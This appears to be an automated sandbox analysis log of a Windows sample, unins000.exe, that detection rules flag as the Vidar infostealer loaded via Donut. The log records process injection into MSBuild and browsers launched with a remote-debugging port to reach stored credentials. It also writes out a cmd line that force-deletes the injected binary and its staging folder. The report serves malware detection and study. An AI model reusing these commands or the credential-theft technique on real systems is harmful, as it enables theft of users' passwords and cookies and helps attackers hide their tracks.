Source: unknown Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.120.106:443 -> 192.168.2.5:49851 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_0040EAB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00405AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop, 3_2_00405AD3

System Summary

barindex
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: 0.2.unins000.exe.3295502.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.unins000.exe.3295502.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2401777257.0000000003293000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07025768 NtProtectVirtualMemory, 0_2_07025768
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07024100 NtQueryInformationProcess, 0_2_07024100
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07029540 NtResumeThread, 0_2_07029540
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07025760 NtProtectVirtualMemory, 0_2_07025760
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07029538 NtResumeThread, 0_2_07029538
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_070240F9 NtQueryInformationProcess, 0_2_070240F9
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0308E928 0_2_0308E928
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0308A5B8 0_2_0308A5B8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0308A5C8 0_2_0308A5C8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0308AF00 0_2_0308AF00
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0308AF50 0_2_0308AF50
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0308AE75 0_2_0308AE75
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03293485 0_2_03293485
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0348633A 0_2_0348633A
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03483AE2 0_2_03483AE2
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03481946 0_2_03481946
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03483042 0_2_03483042
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03293000 0_2_03293000
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_0348283A 0_2_0348283A
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03482C0A 0_2_03482C0A
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F4B200 0_2_06F4B200
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F46FE8 0_2_06F46FE8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F426C5 0_2_06F426C5
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F48FF0 0_2_06F48FF0
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F48FE0 0_2_06F48FE0
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F46FDB 0_2_06F46FDB
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F47B38 0_2_06F47B38
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F47B28 0_2_06F47B28
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F40040 0_2_06F40040
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F40007 0_2_06F40007
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F4B1F0 0_2_06F4B1F0
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F46DB8 0_2_06F46DB8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F46D3F 0_2_06F46D3F
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5DD90 0_2_06F5DD90
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5A543 0_2_06F5A543
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F57BD8 0_2_06F57BD8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F52374 0_2_06F52374
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5EF98 0_2_06F5EF98
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F57BC8 0_2_06F57BC8
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5AB98 0_2_06F5AB98
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5AB88 0_2_06F5AB88
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5E0B7 0_2_06F5E0B7
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06F5A116 0_2_06F5A116
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FBA300 0_2_06FBA300
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FB27F0 0_2_06FB27F0
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FB27E0 0_2_06FB27E0
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FBA2F0 0_2_06FBA2F0
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_06FED330 0_2_06FED330
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07022170 0_2_07022170
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07021500 0_2_07021500
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07021510 0_2_07021510
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07030006 0_2_07030006
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_07030040 0_2_07030040
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072EF548 0_2_072EF548
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072EF840 0_2_072EF840
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072EDF80 0_2_072EDF80
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072D0006 0_2_072D0006
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072D0040 0_2_072D0040
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_072EE4B0 0_2_072EE4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00404B3F 3_2_00404B3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00414F57 3_2_00414F57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00417B66 3_2_00417B66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040AF7E 3_2_0040AF7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00416FF1 3_2_00416FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004151BF 3_2_004151BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 0040D84A appears 139 times
Source: unins000.exe Static PE information: invalid certificate
Source: unins000.exe Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: unins000.exe Static PE information: Number of sections : 11 > 10
Source: unins000.exe Binary or memory string: OriginalFilename vs unins000.exe
Source: unins000.exe, 00000000.00000002.2401777257.0000000003293000.00000040.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHojzy.exe, vs unins000.exe
Source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs unins000.exe
Source: unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs unins000.exe
Source: unins000.exe, 00000000.00000002.2427363396.0000000004A57000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs unins000.exe
Source: unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs unins000.exe
Source: unins000.exe, 00000000.00000003.2346763323.0000000004A26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameHojzy.exe, vs unins000.exe
Source: unins000.exe, 00000000.00000003.2346763323.0000000004A26000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs unins000.exe
Source: unins000.exe, 00000000.00000002.2429992894.0000000005FF0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs unins000.exe
Source: unins000.exe, 00000000.00000003.2346399268.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWxject.dll" vs unins000.exe
Source: unins000.exe, 00000000.00000002.2431668373.0000000006180000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameHojzy.exe, vs unins000.exe
Source: unins000.exe, 00000000.00000002.2404445235.0000000003A01000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs unins000.exe
Source: unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs unins000.exe
Source: unins000.exe, 00000000.00000000.2067582469.00000000008C0000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs unins000.exe
Source: unins000.exe, 00000000.00000002.2438196636.0000000007040000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs unins000.exe
Source: unins000.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.unins000.exe.3295502.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.unins000.exe.3295502.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2401777257.0000000003293000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.unins000.exe.4acf770.3.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@48/104@22/13
Source: C:\Users\user\Desktop\unins000.exe Code function: 0_2_03293B95 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle, 0_2_03293B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YD0C1GVR.htm Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\7a6a22a0-93ae-4ab7-9985-f6ff98cc8a3d.tmp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: chrome.exe, 00000005.00000002.2636318075.000077B000720000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: db1dbaiwt.3.dr, ohd2nglfk.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unins000.exe, 00000000.00000002.2401777257.0000000003293000.00000040.00000020.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2346763323.0000000004A26000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2431668373.0000000006180000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: update [{0}] set data = @data, revision = @next_revision where id = @id and revision = @current_revisionMdelete from [{0}] where saga_id = @id;
Source: unins000.exe String found in binary or memory: rebus-return-address
Source: unknown Process created: C:\Users\user\Desktop\unins000.exe "C:\Users\user\Desktop\unins000.exe"
Source: C:\Users\user\Desktop\unins000.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2260,i,17557668886375203831,15970491711285165738,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3292 --field-trial-handle=2608,i,560888103664990175,3420741172792442568,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6608 --field-trial-handle=2608,i,560888103664990175,3420741172792442568,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6760 --field-trial-handle=2608,i,560888103664990175,3420741172792442568,262144 /prefetch:8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\yct26" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\unins000.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & rd /s /q "C:\ProgramData\yct26" & exit Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2260,i,17557668886375203831,15970491711285165738,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3292 --field-trial-handle=2608,i,560888103664990175,3420741172792442568,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6608 --field-trial-handle=2608,i,560888103664990175,3420741172792442568,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6760 --field-trial-handle=2608,i,560888103664990175,3420741172792442568,262144 /prefetch:8 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\unins000.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
